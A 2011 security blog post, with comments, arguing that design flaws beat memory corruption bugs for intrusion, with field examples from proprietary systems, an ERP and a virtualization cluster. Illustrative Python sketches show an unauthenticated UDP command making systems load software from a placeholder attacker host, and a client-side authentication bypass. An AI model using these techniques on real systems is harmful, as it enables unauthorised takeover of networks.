Thursday, September 22, 2011

My Personal War Against Overuse of Memory Corruption Bugs


I remember, many years ago, writing my first buffer overflow: a standard stack-bug privilege escalation in, I think, Red Hat 7.x, which I thought was awesome. I remember writing my first SEH overwrite on Windows, marveling at POP POP RETs, and spending hours poring through memory in WinDbg wondering why my shellcode was getting trashed. I even remember the moment when I "got" return-to-libc. Somewhat in contrast to many "researcher" exploit developers and bug hunters, I also break into computers, lots of them. At last count I was well over the 100,000 mark of computers I have personally gotten into, taken control of, and extracted data from. This is not to tell you how awesome I think I am (I'm not; there are IRC script kiddies with 10x the number of compromises under their belt) but rather to provide a statistical frame of reference for what I am going to say next.

Several years ago I decided to pull back from the memory corruption rat race, but I never really talked about why.

When breaking into computers, I almost never use memory corruption bugs. I occasionally, but rarely, develop new memory corruption bugs into exploits. Memory corruption bugs, IMO, are a bad long-term return on investment. Sure, someone like Charlie Miller can crank out 100 Adobe product crashes in the blink of an eye, but how much skilled time investment is required to take a bug from a crash to a highly reliable, continuation-of-execution, ASLR/DEP-bypassing exploit ready for serious use? Average numbers I have heard from friends who do this all day long are 1-3 months, with 6 months for particularly sticky bugs. How many people are there who can do this? Not many. So you have a valuable resource tied up for months at a time to produce a bug which may get discovered and published in the interim (a process you have no real control over), patched, and killed. When was the last time you heard about a really bitchin' Windows 7 64-bit remote? It's been a while. So you put in all that time and investment to produce a nice 0day, only to watch it get killed. Then you start looking for the next one. What's the going price on the market for an 0day? $100k, $200k, etc. Expensive for something with a potentially limited life, putting aside for a moment the fact that people don't patch anyway.

So what do I like instead, then? I like design flaws that are integral to the way a system works and are extremely costly to fix, that don't barf a bunch of shellcode across a potentially IDS/IPS-ridden wire, and that simply take advantage of the way things are supposed to work anyway. Lest you think I spend all my time keylogging "password123", let me give some real-world examples:

- Proprietary, custom hardware/OS and software system used for some interesting applications. The system has a UDP listening service. After reversing the service binary we discovered that it takes a cleartext, unauthenticated protocol blob. The process then, based on what's in the blob, calls another process that execs a variety of system commands. One of these commands sends out a message to the various systems in the network to mount a given network file system and load specified software. So we craft our own protocol blobs, build our own network file system with specially crafted malicious software, and take over all the systems at once (a sketch of the blob-sending step follows this list). We spoke with the designers of the system about what it would take to change it, and due to various rules and policies we were looking at 18-24 months to push out a redesign, and that's after whatever time was needed to develop the new system.

- Foreign client/server ERP system that handles supply chain and even has some tie-ins with some SCADA components. Authentication works as follows: the client enters a username and password. The client app connects to the server and sends an authentication request with the provided username. The server checks whether the username exists and, if so, sends a hash of the user's password back to the client app. The client app checks whether the local password hash matches the one sent from the server, and if it matches, the client informs the server that the account is valid and the server then successfully authenticates the client. So yes, very broken client-side authentication (the second sketch after this list shows why). But to figure that out we had to analyze the network traffic between the two as well as reverse engineer the client application and binary patch the client app to always respond with a positive match. And the data or effects gained from compromising this system are way more interesting than your Windows 7 home gaming system.

- Large company virtualization cluster using hardware from a well-known vendor. The servers provide remote console/KVM functionality for management. Because of a previously unknown authentication vulnerability in the remote console app, we were able to boot the server to remote media under our control (i.e. a Linux boot disk). We had reverse engineered the virtualization technology in question and developed a custom backdoor, which we then implanted by mounting the hard drive from our remotely loaded Linux boot environment, allowing us to take control of the cluster.
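
To make the first example concrete, here is a minimal sketch of the blob-sending step. Everything in it is hypothetical: the address, port, magic value, blob layout, and the "mount and load" command code are stand-ins, since the real protocol was proprietary. The point is simply that the service accepted any well-formed blob that arrived, with no authentication at all.

```python
import socket
import struct

# Hypothetical layout, as if recovered by reversing the service binary:
#   magic (4 bytes) | command code (2 bytes) | payload length (2 bytes) | payload
# Command 0x0007 (invented here) tells listeners to mount an NFS path
# and load whatever software they find there.
TARGET = ("192.0.2.10", 5140)          # placeholder address and port
MAGIC = b"\x13\x37\xbe\xef"            # placeholder magic value
CMD_MOUNT_AND_LOAD = 0x0007

def build_blob(nfs_path: bytes) -> bytes:
    # Big-endian command code and payload length, then the payload itself.
    return MAGIC + struct.pack(">HH", CMD_MOUNT_AND_LOAD, len(nfs_path)) + nfs_path

# Point every listener at a file system export we control, serving our software.
blob = build_blob(b"attacker-host:/export/payload")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(blob, TARGET)  # cleartext, unauthenticated: the service just obeys
```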
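
And here is the logic behind the second example's broken handshake, again as a sketch with invented message names (the hash algorithm is a guess too). The server hands the client the stored password hash and then trusts the client's verdict on the comparison, so a binary-patched client that always reports a match authenticates as any valid username:

```python
import hashlib

def server_handle_auth_request(username, user_db, client_verdict):
    """Server side: look up the user, SEND the stored hash to the client,
    then believe whatever the client says about the comparison."""
    if username not in user_db:
        return "AUTH_FAIL"
    stored_hash = user_db[username]          # leaked to the client!
    verdict = client_verdict(stored_hash)    # comparison happens client-side
    return "AUTH_OK" if verdict == "MATCH" else "AUTH_FAIL"

def honest_client(password):
    # What the unmodified client app does: hash locally and compare.
    def verdict(stored_hash):
        local = hashlib.md5(password.encode()).hexdigest()  # algorithm assumed
        return "MATCH" if local == stored_hash else "NO_MATCH"
    return verdict

def patched_client():
    # The binary patch: force the comparison result, no password needed.
    return lambda stored_hash: "MATCH"

user_db = {"operator": hashlib.md5(b"hunter2").hexdigest()}
print(server_handle_auth_request("operator", user_db, honest_client("wrong")))  # AUTH_FAIL
print(server_handle_auth_request("operator", user_db, patched_client()))        # AUTH_OK
```

The fix is equally obvious from the sketch, which is the point: the comparison has to move server-side, and in a deployed client/server ERP system that is a protocol change on both ends, not a patch.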

With the exception of the server reboot in the last example, none of the above generated any traffic or logs that were flagged by any security system. No IDS or AV to evade. No DEP or ASLR to get around. And a low chance of these bugs getting killed, due to the cost and time frame involved in fixing them.

I believe researchers should consider putting some of their time and resources into these types of design flaws, as well as into sophisticated post-exploitation activities. The market value of memory corruption bugs will go up for a while, but so will the difficulty and time required to find them, and we have often seen patch release times decrease as well. Eventually that bubble will burst.

V.

valsmith

6 comments:

pentest said...

Very interesting point of view about the state of the security, I share the same.

Jesse Krembs said...

What's interesting about the stack overflow business is that it appears to be a good way to keep making money. It's got a "business model".

Anonymous said...

I used a similar approach for all my ZDI bugs. To date I've only sold a few memory corruption bugs; most were logic flaws.

Scarlet Pimpernel said...

Did this post come up after our entertaining chat? :))

theta said...

Great post. The reply I usually see to demonstrating such exploits is either, "yeah, but only you would do that", or, "it's internal network only, so it's ok". Have you gotten responses like this, and if so, what do you do about it?

valsmith said...

Scarlet, yeh somewhat :)

Theta, we usually have already done a remote intrusion test and successfully proved we can breach their perimeter. Never failed at that so far, assuming proper scoping.